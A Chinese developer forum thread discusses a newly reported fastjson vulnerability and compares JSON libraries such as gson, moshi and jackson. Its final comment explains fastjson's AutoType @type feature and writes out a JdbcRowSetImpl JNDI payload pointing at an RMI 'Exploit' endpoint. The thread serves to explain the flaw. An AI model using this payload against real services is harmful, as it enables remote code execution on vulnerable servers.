fastjson 又爆 bug 了!快来看看是否受影响

@sagaxu JakeWharton 最近的推上有说，gson 基本属于弃坑，2/3 的开发者参与了 moshi 开发，moshi 可以认为是 gson3

@murmur
client 和 server 端都在我们自己手里, 可以控制, 中间过了一道 http 的第三方的服务. 问题是这个服务输入输出不一致...
不过这个第三方服务不出错.

@wobuhuicode
问题是中间过的第三方服务做的, 我们自己的 client 和 server 用 http 直连测过以后再连人家服务发现这个问题的.

我用 msgpack……不知道怎么样

@stormsuncc 不知道你是什么心理。都说转 jackson，提出 jackson 也有漏洞，有什么问题？国外的框架有漏洞不让说？

没有高级反序列化，就没有伤害

@ZSeptember 他都说了人家房子完好，说明是选择性失明+失智

没啥好说的啦

一直用的 gson

这玩意不报 bug 才不正常

@TomDu
https://www.reddit.com/r/androiddev/comments/684flw/comment/dgx3gpm
https://twitter.com/JakeWharton/status/1265998249476993026?s=19

有 bug 不是正常?

有点迷，这算是没关注比有关注强吗。。。。
特别有几位大佬一个劲的批判也不知道为啥。。

反序列化注入漏洞，年年都报

@JasonLaw
因为“产生对象的 class 是自己写的”这句话在某些情况下是不对的。
除了常见的“标准”json 外，还存在“标记了反序列化目标类型“的非标准 json 。json 反序列化的大部分漏洞都是通过更改这类 json 的类型标记，实例化一些敏感类进行攻击。

在哪里能看到 fastjson 所有历史缺陷，及 jackson 的所有历史缺陷，想坐下选型前的对比。

对性能有要求的，直接上 protobuf 吧

马上就 618 了，现在紧急更新等于找骂。

fastjson 有个 AutoType 特性，JSON 中会带类型信息 @type ；
JSON 字符串反序列化时，会读取 @type 内容，把 JSON 反序列化成这个对象，并且会调用这个类的 setter 方法;
那么就可以利用这个特性，自己构造一个 JSON 字符串，并且使用 @type 指定一个自己想要使用的攻击类库,比如：com.sun.rowset.JdbcRowSetImpl
在 JdbcRowSetImpl 的 dataSourceName 中设置一个想要执行的命令
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
就可以攻击远程数据库